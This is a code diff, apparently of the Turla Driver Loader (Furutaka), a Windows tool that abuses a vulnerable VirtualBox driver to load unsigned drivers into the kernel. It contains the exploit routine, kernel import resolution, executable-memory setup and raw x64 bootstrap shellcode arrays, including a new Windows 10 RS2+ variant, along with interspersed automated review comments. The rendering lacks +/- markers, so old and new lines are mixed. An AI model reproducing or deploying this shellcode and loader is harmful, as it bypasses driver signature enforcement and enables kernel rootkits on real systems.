<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
@ -78,23 +78,23 @@
<WarningLevel>Level4</WarningLevel>
<PrecompiledHeader>
</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<Optimization>Full</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<CompileAs>CompileAsC</CompileAs>
<MultiProcessorCompilation>true</MultiProcessorCompilation>
<StringPooling>true</StringPooling>
<EnablePREfast>false</EnablePREfast>
<ControlFlowGuard>Guard</ControlFlowGuard>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
<FavorSizeOrSpeed>Neither</FavorSizeOrSpeed>
<SDLCheck>true</SDLCheck>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
<GenerateDebugInformation>false</GenerateDebugInformation>
<EntryPointSymbol>TDLMain</EntryPointSymbol>
<SetChecksum>true</SetChecksum>
<UACExecutionLevel>RequireAdministrator</UACExecutionLevel>
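Review bot: Switching `CodeAnalysisRuleSet` to `AllRules.ruleset` in the first hunk has no effect while `<RunCodeAnalysis>false</RunCodeAnalysis>` stays in the same property group, so the stricter rule set is never run. Either enable analysis for at least one configuration or leave the ruleset as it was. In the second hunk `SDLCheck` is listed twice; it was presumably moved within `ClCompile`, but the result is worth checking for a duplicate element.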


@ -4,9 +4,9 @@
*
* TITLE: GLOBAL.H
*
* VERSION: 1.10
* VERSION: 1.11
*
* DATE: 17 Apr 2017
* DATE: 20 Apr 2017
*
* Common header file for the program support routines.
*


@ -4,9 +4,9 @@
*
* TITLE: MAIN.C
*
* VERSION: 1.10
* VERSION: 1.11
*
* DATE: 17 Apr 2017
* DATE: 20 Apr 2017
*
* Furutaka entry point.
*
@ -34,17 +34,18 @@ BOOL g_ConsoleOutput = FALSE;
BOOL g_VBoxInstalled = FALSE;
WCHAR g_BE = 0xFEFF;
ULONG g_NtBuildNumber = 0;
#define VBoxDrvSvc TEXT("VBoxDrv")
#define supImageName "furutaka"
#define supImageHandle 0x1a000
#define PAGE_SIZE 0x1000
#define scDataOffset 0x214 //shellcode data offset
#define T_LOADERTITLE TEXT("Turla Driver Loader v1.1 (17/04/17)")
#define T_LOADERTITLE TEXT("Turla Driver Loader v1.1.1 (20/04/17)")
#define T_LOADERUNSUP TEXT("Unsupported WinNT version\r\n")
#define T_LOADERRUN TEXT("Another instance running, close it before\r\n")
#define T_LOADERUSAGE TEXT("Usage: loader drivertoload\n\re.g. loader mydrv.sys\r\n")
#define T_LOADERINTRO TEXT("Turla Driver Loader v1.1.0 started\r\n(c) 2016 - 2017 TDL Project\r\nSupported x64 OS : 7 and above\r\n")
#define T_LOADERINTRO TEXT("Turla Driver Loader v1.1.1 started\r\n(c) 2016 - 2017 TDL Project\r\nSupported x64 OS : 7 and above\r\n")
/*
* TDLVBoxInstalled
@ -83,8 +84,8 @@ BOOL TDLVBoxInstalled(
*
*/
void TDLRelocImage(
ULONG_PTR Image,
ULONG_PTR NewImageBase
_In_ ULONG_PTR Image,
_In_ ULONG_PTR NewImageBase
)
{
PIMAGE_OPTIONAL_HEADER popth;
@ -139,9 +140,9 @@ void TDLRelocImage(
*
*/
ULONG_PTR TDLGetProcAddress(
ULONG_PTR KernelBase,
ULONG_PTR KernelImage,
LPCSTR FunctionName
_In_ ULONG_PTR KernelBase,
_In_ ULONG_PTR KernelImage,
_In_ LPCSTR FunctionName
)
{
ANSI_STRING cStr;
@ -163,9 +164,9 @@ ULONG_PTR TDLGetProcAddress(
*
*/
void TDLResolveKernelImport(
ULONG_PTR Image,
ULONG_PTR KernelImage,
ULONG_PTR KernelBase
_In_ ULONG_PTR Image,
_In_ ULONG_PTR KernelImage,
_In_ ULONG_PTR KernelBase
)
{
PIMAGE_OPTIONAL_HEADER popth;
@ -211,8 +212,9 @@ void TDLResolveKernelImport(
*
*/
void TDLExploit(
LPVOID Shellcode,
ULONG CodeSize
_In_ LPVOID Shellcode,
_In_ ULONG CodeSize,
_In_ ULONG DataOffset
)
{
SUPCOOKIE Cookie;
@ -307,7 +309,7 @@ void TDLExploit(
ultohex(CodeSize, _strend(text));
_strcat(text, TEXT("\r\n\tDriver image mapped at 0x"));
u64tohex((ULONG_PTR)ImageBase + scDataOffset, _strend(text));
u64tohex((ULONG_PTR)ImageBase + DataOffset, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
}
@ -376,13 +378,14 @@ void TDLExploit(
*
*/
UINT TDLMapDriver(
LPWSTR lpDriverFullName
_In_ LPWSTR lpDriverFullName
)
{
UINT result = (UINT)-1;
ULONG isz;
ULONG isz, prologueSize, dataOffset;
SIZE_T memIO;
ULONG_PTR KernelBase, KernelImage = 0, xExAllocatePoolWithTag = 0, xPsCreateSystemThread = 0;
ULONG_PTR KernelBase, KernelImage = 0;
ULONG_PTR xExAllocatePoolWithTag = 0, xPsCreateSystemThread = 0, xZwClose = 0;
HMODULE Image = NULL;
PIMAGE_NT_HEADERS FileHeader;
PBYTE Buffer = NULL;
@ -443,6 +446,7 @@ UINT TDLMapDriver(
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
}
if (g_NtBuildNumber < 15063) {
RtlInitString(&routineName, "PsCreateSystemThread");
status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xPsCreateSystemThread);
if ((!NT_SUCCESS(status)) || (xPsCreateSystemThread == 0)) {
@ -455,6 +459,19 @@ UINT TDLMapDriver(
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
}
RtlInitString(&routineName, "ZwClose");
status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xZwClose);
if ((!NT_SUCCESS(status)) || (xZwClose == 0)) {
cuiPrintText(g_ConOut, TEXT("Ldr: Error, ZwClose address not found"), g_ConsoleOutput, TRUE);
break;
}
else {
_strcpy(text, TEXT("Ldr: ZwClose 0x"));
u64tohex(KernelBase + (xZwClose - KernelImage), _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
}
}
memIO = isz + PAGE_SIZE;
NtAllocateVirtualMemory(NtCurrentProcess(), (PVOID)&Buffer, 0, &memIO,
MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
@ -470,25 +487,49 @@ UINT TDLMapDriver(
// mov rcx, ExAllocatePoolWithTag
// mov rdx, PsCreateSystemThread
// mov r8, ZwClose
Buffer[0x00] = 0x48; // mov rcx, xxxxx
Buffer[0x01] = 0xb9;
*((PULONG_PTR)&Buffer[2]) =
KernelBase + (xExAllocatePoolWithTag - KernelImage);
if (g_NtBuildNumber < 15063) {
Buffer[0x0a] = 0x48; // mov rdx, xxxxx
Buffer[0x0b] = 0xba;
*((PULONG_PTR)&Buffer[0x0c]) =
KernelBase + (xPsCreateSystemThread - KernelImage);
Buffer[0x14] = 0x49; //mov r8, xxxxx
Buffer[0x15] = 0xb8;
*((PULONG_PTR)&Buffer[0x16]) =
KernelBase + (xZwClose - KernelImage);
RtlCopyMemory(Buffer + 0x14,
prologueSize = 0x1e;
}
else {
prologueSize = 0x0a;
}
dataOffset = prologueSize + MAX_SHELLCODE_LENGTH;
if (g_NtBuildNumber < 15063) {
RtlCopyMemory(Buffer + prologueSize,
TDLBootstrapLoader_code, sizeof(TDLBootstrapLoader_code));
RtlCopyMemory(Buffer + scDataOffset, Image, isz);
cuiPrintText(g_ConOut, TEXT("Ldr: Default bootstrap shellcode selected"), g_ConsoleOutput, TRUE);
}
else {
RtlCopyMemory(Buffer + prologueSize,
TDLBootstrapLoader_code_w10rs2, sizeof(TDLBootstrapLoader_code_w10rs2));
cuiPrintText(g_ConOut, TEXT("Ldr: Windows 10 RS2+ bootstrap shellcode selected"), g_ConsoleOutput, TRUE);
}
RtlCopyMemory(Buffer + dataOffset, Image, isz);
cuiPrintText(g_ConOut, TEXT("Ldr: Resolving kernel import"), g_ConsoleOutput, TRUE);
TDLResolveKernelImport((ULONG_PTR)Buffer + scDataOffset, KernelImage, KernelBase);
TDLResolveKernelImport((ULONG_PTR)Buffer + dataOffset, KernelImage, KernelBase);
cuiPrintText(g_ConOut, TEXT("Ldr: Executing exploit"), g_ConsoleOutput, TRUE);
TDLExploit(Buffer, isz + PAGE_SIZE);
TDLExploit(Buffer, isz + PAGE_SIZE, dataOffset);
result = 0;
break;
}
@ -575,14 +616,15 @@ HANDLE TDLStartVulnerableDriver(
}
}
//if vbox installed backup it driver, do it before dropping our
//
// If vbox installed backup it driver, do it before dropping our
// Ignore error if file not found
//
if (g_VBoxInstalled) {
if (supBackupVBoxDrv(FALSE) == FALSE) {
cuiPrintText(g_ConOut,
TEXT("Ldr: Error while doing VirtualBox driver backup"),
g_ConsoleOutput, TRUE);
break;
}
}
@ -717,7 +759,7 @@ void TDLStopVulnerableDriver(
*
*/
UINT TDLProcessCommandLine(
LPWSTR lpCommandLine
_In_ LPWSTR lpCommandLine
)
{
UINT retVal = (UINT)-1;
@ -765,7 +807,7 @@ void TDLMain()
UINT uResult = 0;
DWORD dwTemp;
LONG x;
OSVERSIONINFOW osv;
OSVERSIONINFO osv;
WCHAR text[256];
__security_init_cookie();
@ -795,7 +837,6 @@ void TDLMain()
T_LOADERINTRO,
g_ConsoleOutput, TRUE);
x = InterlockedIncrement((PLONG)&g_lApplicationInstances);
if (x > 1) {
cuiPrintText(g_ConOut,
@ -817,6 +858,8 @@ void TDLMain()
break;
}
g_NtBuildNumber = osv.dwBuildNumber;
_strcpy(text, TEXT("Ldr: Windows v"));
ultostr(osv.dwMajorVersion, _strend(text));
_strcat(text, TEXT("."));
@ -825,6 +868,10 @@ void TDLMain()
ultostr(osv.dwBuildNumber, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
//
// If VirtualBox installed on the same machine warn user,
// however this is unnecessary can lead to any conflicts.
//
g_VBoxInstalled = TDLVBoxInstalled();
if (g_VBoxInstalled) {
cuiPrintText(g_ConOut,

Binary file not shown.


@ -4,9 +4,9 @@
*
* TITLE: SHELLCODE.H
*
* VERSION: 1.10
* VERSION: 1.11
*
* DATE: 17 Apr 2017
* DATE: 20 Apr 2017
*
* Loader bootstrap shellcode.
*
@ -22,8 +22,7 @@
typedef PVOID(NTAPI *PfnExAllocatePoolWithTag)(
_In_ POOL_TYPE PoolType,
_In_ SIZE_T NumberOfBytes,
_In_ ULONG Tag
);
_In_ ULONG Tag);
typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)(
_Out_ PHANDLE ThreadHandle,
@ -32,8 +31,14 @@ typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)(
_In_opt_ HANDLE ProcessHandle,
_Out_opt_ PCLIENT_ID ClientId,
_In_ PKSTART_ROUTINE StartRoutine,
_In_opt_ PVOID StartContext
);
_In_opt_ PVOID StartContext);
typedef NTSTATUS (NTAPI *PfnZwClose)(
_In_ HANDLE Handle);
typedef NTSTATUS(NTAPI *PfnDriverEntry)();
#define MAX_SHELLCODE_LENGTH 0x300
/*
* TDLBootstrapLoader
@ -46,10 +51,11 @@ typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)(
/*
void TDLBootstrapLoader(
PfnExAllocatePoolWithTag ExAllocatePoolWithTag,
PfnPsCreateSystemThread PsCreateSystemThread)
PfnPsCreateSystemThread PsCreateSystemThread,
PfnZwClose ZwClose)
{
ULONG_PTR pos, exbuffer,
Image = ((ULONG_PTR)&TDLBootstrapLoader) + 0x200;
Image = ((ULONG_PTR)&TDLBootstrapLoader) + MAX_SHELLCODE_LENGTH;
PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Image;
PIMAGE_FILE_HEADER fileh =
@ -110,36 +116,148 @@ void TDLBootstrapLoader(
for (pos = 0; pos < isz; pos++)
((PULONG64)exbuffer)[pos] = ((PULONG64)Image)[pos];
th = NULL;
InitializeObjectAttributes(&attr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);
PsCreateSystemThread(&th, THREAD_ALL_ACCESS, &attr, NULL, NULL,
(PKSTART_ROUTINE)(exbuffer + popth->AddressOfEntryPoint), NULL);
if (NT_SUCCESS(PsCreateSystemThread(&th, THREAD_ALL_ACCESS, &attr, NULL, NULL,
(PKSTART_ROUTINE)(exbuffer + popth->AddressOfEntryPoint), NULL)))
{
ZwClose(th);
}
}
*/
static const unsigned char TDLBootstrapLoader_code[415] = {
0x40, 0x53, 0x56, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x48, 0x83, 0xEC, 0x70, 0x4C, 0x8B, 0xE2,
0x4C, 0x89, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xC9, 0x48, 0x8D, 0x1D, 0xDE, 0xFF,
0xFF, 0xFF, 0x48, 0x81, 0xC3, 0x00, 0x02, 0x00, 0x00, 0x33, 0xC9, 0x41, 0xB8, 0x54, 0x64, 0x6C,
0x53, 0x4C, 0x63, 0x73, 0x3C, 0x4C, 0x03, 0xF3, 0x45, 0x8B, 0x7E, 0x50, 0x41, 0x8D, 0x97, 0x00,
0x10, 0x00, 0x00, 0x41, 0xFF, 0xD1, 0x45, 0x33, 0xED, 0x48, 0x8D, 0xB0, 0x00, 0x10, 0x00, 0x00,
0x48, 0x81, 0xE6, 0x00, 0xF0, 0xFF, 0xFF, 0x41, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x05, 0x0F,
0x86, 0xAB, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x8E, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84,
0x9C, 0x00, 0x00, 0x00, 0x48, 0x89, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x04, 0x0B,
0x41, 0x8B, 0xAE, 0xB4, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xDE, 0x4D, 0x2B, 0x5E, 0x30, 0x48, 0x89,
0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xFD, 0x85, 0xED, 0x74, 0x63, 0x0F, 0x1F, 0x00,
const unsigned char TDLBootstrapLoader_code[480] = {
0x48, 0x8B, 0xC4, 0x41, 0x54, 0x48, 0x81, 0xEC, 0x90, 0x00, 0x00, 0x00, 0x48, 0x89, 0x58, 0x10,
0x4D, 0x8B, 0xE0, 0x48, 0x89, 0x68, 0x18, 0x48, 0x8D, 0x1D, 0xE2, 0xFF, 0xFF, 0xFF, 0x4C, 0x89,
0x68, 0xE8, 0x48, 0x81, 0xC3, 0x00, 0x03, 0x00, 0x00, 0x4C, 0x89, 0x70, 0xE0, 0x4C, 0x8B, 0xEA,
0x4C, 0x89, 0x78, 0xD8, 0x4C, 0x8B, 0xC9, 0x33, 0xC9, 0x41, 0xB8, 0x54, 0x64, 0x6C, 0x53, 0x4C,
0x63, 0x73, 0x3C, 0x4C, 0x03, 0xF3, 0x45, 0x8B, 0x7E, 0x50, 0x41, 0x8D, 0x97, 0x00, 0x10, 0x00,
0x00, 0x41, 0xFF, 0xD1, 0x45, 0x33, 0xC9, 0x48, 0x8D, 0xA8, 0x00, 0x10, 0x00, 0x00, 0x48, 0x81,
0xE5, 0x00, 0xF0, 0xFF, 0xFF, 0x41, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x05, 0x0F, 0x86, 0xB0,
0x00, 0x00, 0x00, 0x41, 0x8B, 0x8E, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84, 0xA1, 0x00,
0x00, 0x00, 0x48, 0x89, 0xB4, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x04, 0x0B, 0x41, 0x8B,
0xB6, 0xB4, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xDD, 0x4D, 0x2B, 0x5E, 0x30, 0x48, 0x89, 0xBC, 0x24,
0x88, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xF9, 0x85, 0xF6, 0x74, 0x68, 0x0F, 0x1F, 0x44, 0x00, 0x00,
0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x50, 0x08, 0x45, 0x39, 0x48, 0x04, 0x76, 0x43,
0x41, 0x0F, 0xB7, 0x02, 0x8B, 0xC8, 0xC1, 0xE9, 0x0C, 0x83, 0xF9, 0x03, 0x74, 0x17, 0x83, 0xF9,
0x0A, 0x75, 0x22, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x4C,
0x01, 0x1C, 0x0A, 0xEB, 0x10, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C,
0x03, 0x44, 0x01, 0x1C, 0x0A, 0x49, 0x83, 0xC2, 0x02, 0x41, 0x83, 0xC1, 0x02, 0x45, 0x3B, 0x48,
0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x3B, 0xFD, 0x72, 0xA0,
0x48, 0x8B, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00,
0x49, 0x8B, 0xD7, 0x4C, 0x8B, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0xC1, 0xEA, 0x03, 0x48,
0x85, 0xD2, 0x74, 0x1D, 0x48, 0x8B, 0xCE, 0x48, 0x2B, 0xDE, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00,
0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x3B, 0xFE, 0x72, 0xA0,
0x45, 0x33, 0xC9, 0x48, 0x8B, 0xB4, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xBC, 0x24, 0x88,
0x00, 0x00, 0x00, 0x49, 0x8B, 0xD7, 0x4C, 0x8B, 0x7C, 0x24, 0x70, 0x48, 0xC1, 0xEA, 0x03, 0x48,
0x85, 0xD2, 0x74, 0x1D, 0x48, 0x8B, 0xCD, 0x48, 0x2B, 0xDD, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00,
0x48, 0x8B, 0x04, 0x0B, 0x48, 0x89, 0x01, 0x48, 0x8D, 0x49, 0x08, 0x48, 0x83, 0xEA, 0x01, 0x75,
0xEF, 0x0F, 0x57, 0xC0, 0xC7, 0x44, 0x24, 0x40, 0x30, 0x00, 0x00, 0x00, 0xF3, 0x0F, 0x7F, 0x44,
0x24, 0x60, 0x4C, 0x89, 0x6C, 0x24, 0x48, 0x4C, 0x8D, 0x44, 0x24, 0x40, 0xC7, 0x44, 0x24, 0x58,
0x00, 0x02, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x6C, 0x24,
0x50, 0x45, 0x33, 0xC9, 0x41, 0x8B, 0x46, 0x28, 0xBA, 0xFF, 0xFF, 0x1F, 0x00, 0x48, 0x03, 0xC6,
0x4C, 0x89, 0x6C, 0x24, 0x30, 0x48, 0x89, 0x44, 0x24, 0x28, 0x4C, 0x89, 0x6C, 0x24, 0x20, 0x41,
0xFF, 0xD4, 0x48, 0x83, 0xC4, 0x70, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5B, 0xC3
0xEF, 0x4C, 0x89, 0x4C, 0x24, 0x30, 0x4C, 0x8D, 0x44, 0x24, 0x40, 0x4C, 0x89, 0x8C, 0x24, 0xA0,
0x00, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x4C, 0x24, 0x48,
0x0F, 0x57, 0xC0, 0x4C, 0x89, 0x4C, 0x24, 0x50, 0xBA, 0xFF, 0xFF, 0x1F, 0x00, 0xF3, 0x0F, 0x7F,
0x44, 0x24, 0x60, 0xC7, 0x44, 0x24, 0x40, 0x30, 0x00, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x58, 0x00,
0x02, 0x00, 0x00, 0x41, 0x8B, 0x46, 0x28, 0x48, 0x03, 0xC5, 0x48, 0x89, 0x44, 0x24, 0x28, 0x4C,
0x89, 0x4C, 0x24, 0x20, 0x45, 0x33, 0xC9, 0x41, 0xFF, 0xD5, 0x4C, 0x8B, 0x74, 0x24, 0x78, 0x4C,
0x8B, 0xAC, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xAC, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x48,
0x8B, 0x9C, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x85, 0xC0, 0x78, 0x0B, 0x48, 0x8B, 0x8C, 0x24, 0xA0,
0x00, 0x00, 0x00, 0x41, 0xFF, 0xD4, 0x48, 0x81, 0xC4, 0x90, 0x00, 0x00, 0x00, 0x41, 0x5C, 0xC3
};
/*
* TDLBootstrapLoader_w10rs2
*
* Purpose:
*
* Main part of shellcode used to execute driver code since w10rs2.
*
*/
/*
void TDLBootstrapLoader_w10rs2(
PfnExAllocatePoolWithTag ExAllocatePoolWithTag
)
{
ULONG_PTR pos, exbuffer,
Image = ((ULONG_PTR)&TDLBootstrapLoader_w10rs2) + MAX_SHELLCODE_LENGTH;
PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Image;
PIMAGE_FILE_HEADER fileh =
(PIMAGE_FILE_HEADER)(Image + sizeof(DWORD) + dosh->e_lfanew);
PIMAGE_OPTIONAL_HEADER popth =
(PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER));
PfnDriverEntry DriverEntry;
ULONG isz = popth->SizeOfImage;
PIMAGE_BASE_RELOCATION rel;
DWORD_PTR delta;
LPWORD chains;
DWORD c, p, rsz;
exbuffer = (ULONG_PTR)ExAllocatePoolWithTag(
NonPagedPool, isz + PAGE_SIZE, 'SldT') + PAGE_SIZE;
exbuffer &= ~(PAGE_SIZE - 1);
if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC)
if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0)
{
rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image +
popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;
delta = (DWORD_PTR)exbuffer - popth->ImageBase;
c = 0;
while (c < rsz) {
p = sizeof(IMAGE_BASE_RELOCATION);
chains = (LPWORD)((PBYTE)rel + p);
while (p < rel->SizeOfBlock) {
switch (*chains >> 12) {
case IMAGE_REL_BASED_HIGHLOW:
*(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta;
break;
case IMAGE_REL_BASED_DIR64:
*(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta;
break;
}
chains++;
p += sizeof(WORD);
}
c += rel->SizeOfBlock;
rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock);
}
}
isz >>= 3;
for (pos = 0; pos < isz; pos++)
((PULONG64)exbuffer)[pos] = ((PULONG64)Image)[pos];
DriverEntry = (PfnDriverEntry)(exbuffer + popth->AddressOfEntryPoint);
DriverEntry();
}
*/
static const unsigned char TDLBootstrapLoader_code_w10rs2[321] = {
0x40, 0x53, 0x55, 0x56, 0x48, 0x83, 0xEC, 0x20, 0x4C, 0x8B, 0xC9, 0x4C, 0x89, 0x7C, 0x24, 0x50,
0x48, 0x8D, 0x1D, 0xE9, 0xFF, 0xFF, 0xFF, 0x33, 0xC9, 0x48, 0x81, 0xC3, 0x00, 0x03, 0x00, 0x00,
0x41, 0xB8, 0x54, 0x64, 0x6C, 0x53, 0x48, 0x63, 0x6B, 0x3C, 0x48, 0x03, 0xEB, 0x44, 0x8B, 0x7D,
0x50, 0x41, 0x8D, 0x97, 0x00, 0x10, 0x00, 0x00, 0x41, 0xFF, 0xD1, 0x48, 0x8D, 0xB0, 0x00, 0x10,
0x00, 0x00, 0x48, 0x81, 0xE6, 0x00, 0xF0, 0xFF, 0xFF, 0x83, 0xBD, 0x84, 0x00, 0x00, 0x00, 0x05,
0x0F, 0x86, 0xA5, 0x00, 0x00, 0x00, 0x8B, 0x8D, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84,
0x97, 0x00, 0x00, 0x00, 0x48, 0x89, 0x7C, 0x24, 0x40, 0x4C, 0x8D, 0x04, 0x0B, 0x4C, 0x8B, 0xDE,
0x4C, 0x89, 0x74, 0x24, 0x48, 0x4C, 0x2B, 0x5D, 0x30, 0x33, 0xFF, 0x44, 0x8B, 0xB5, 0xB4, 0x00,
0x00, 0x00, 0x45, 0x85, 0xF6, 0x74, 0x6A, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00,
0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x50, 0x08, 0x45, 0x39, 0x48, 0x04, 0x76, 0x43,
0x41, 0x0F, 0xB7, 0x02, 0x8B, 0xC8, 0xC1, 0xE9, 0x0C, 0x83, 0xF9, 0x03, 0x74, 0x17, 0x83, 0xF9,
0x0A, 0x75, 0x22, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x4C,
0x01, 0x1C, 0x0A, 0xEB, 0x10, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C,
0x03, 0x44, 0x01, 0x1C, 0x0A, 0x49, 0x83, 0xC2, 0x02, 0x41, 0x83, 0xC1, 0x02, 0x45, 0x3B, 0x48,
0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x41, 0x3B, 0xFE, 0x72,
0x9F, 0x48, 0x8B, 0x7C, 0x24, 0x40, 0x4C, 0x8B, 0x74, 0x24, 0x48, 0x49, 0x8B, 0xD7, 0x4C, 0x8B,
0x7C, 0x24, 0x50, 0x48, 0xC1, 0xEA, 0x03, 0x48, 0x85, 0xD2, 0x74, 0x25, 0x48, 0x8B, 0xCE, 0x48,
0x2B, 0xDE, 0x0F, 0x1F, 0x40, 0x00, 0x66, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00,
0x48, 0x8B, 0x04, 0x0B, 0x48, 0x89, 0x01, 0x48, 0x8D, 0x49, 0x08, 0x48, 0x83, 0xEA, 0x01, 0x75,
0xEF, 0x8B, 0x45, 0x28, 0x48, 0x03, 0xC6, 0x48, 0x83, 0xC4, 0x20, 0x5E, 0x5D, 0x5B, 0x48, 0xFF,
0xE0
};
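Review bot: The 480-byte `TDLBootstrapLoader_code` array is defined without `static`, unlike the 415-byte declaration printed just above it and the newly added `TDLBootstrapLoader_code_w10rs2`. Because this is a header, the non-static definition has external linkage, so a second translation unit that includes it would fail to link with a duplicate symbol. The rendering has lost its +/- markers, but the 480-byte version carries the `0x00, 0x03, 0x00, 0x00` immediate that matches `MAX_SHELLCODE_LENGTH 0x300`, so it is presumably the new side; I would keep it as `static const unsigned char TDLBootstrapLoader_code[480] = {`. Both arrays also hard-code that 0x300 offset in their bytes, so the define deserves a comment such as `/* must equal the image offset compiled into both byte arrays below */`. Since a reader cannot check the blobs against the commented C reference, a one-line note of the compiler and options used to produce them would make them reproducible for audit.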


@ -1,32 +1,32 @@
c371453e2eb9edab0949472d14871f09a6c60e4bab647910da83943bb4d3104c *Compiled\dummy.sys
4c8d13b1693c77bc4b75ae0f6262260cbc1478f3da33d039930d265db5d7eb3e *Compiled\dummy2.sys
9c81608bea1766f195ddf49f9a07b23da96dbf17a5e2d66405492eaa3155996e *Compiled\Furutaka.exe
c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv\dummy.sln
01662c807519eac05d7082c151be3824418ccf1716216895680fe5598093d245 *Source\DummyDrv\dummy\dummy.vcxproj
a761bbb4a1b7813132dc8d8ed526d24289dc603bc706da238e1f23d75dbd66aa *Compiled\dummy.sys
f6610691bc3b9f96dad8bfc00b3ceb939ebcb17844d1ca5ee26f8364944ca110 *Compiled\dummy2.sys
bef3056b55e2f29525817e3e44753dcf32152460028d27b28e54cce3a7d1eb0f *Compiled\Furutaka.exe
14eec2753d0e9b432c54c4a70fc59e3be75674313b6308a7a820e6682f775eb9 *Source\DummyDrv\dummy.sln
d61ebda2674d2db05a235478f89fed02c2de049b00ac5648fcebd4c4e638f71c *Source\DummyDrv\dummy\dummy.vcxproj
2d469aafdb7e37a2d58d4e7875abbfd27599762333cba8e28376c16fa7446e9c *Source\DummyDrv\dummy\dummy.vcxproj.filters
d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv\dummy\dummy.vcxproj.user
da9e4121c5a6970b0e10e6cca6fa6065e758f5b54b46c33ff99e7f98d98d00bc *Source\DummyDrv\dummy\main.c
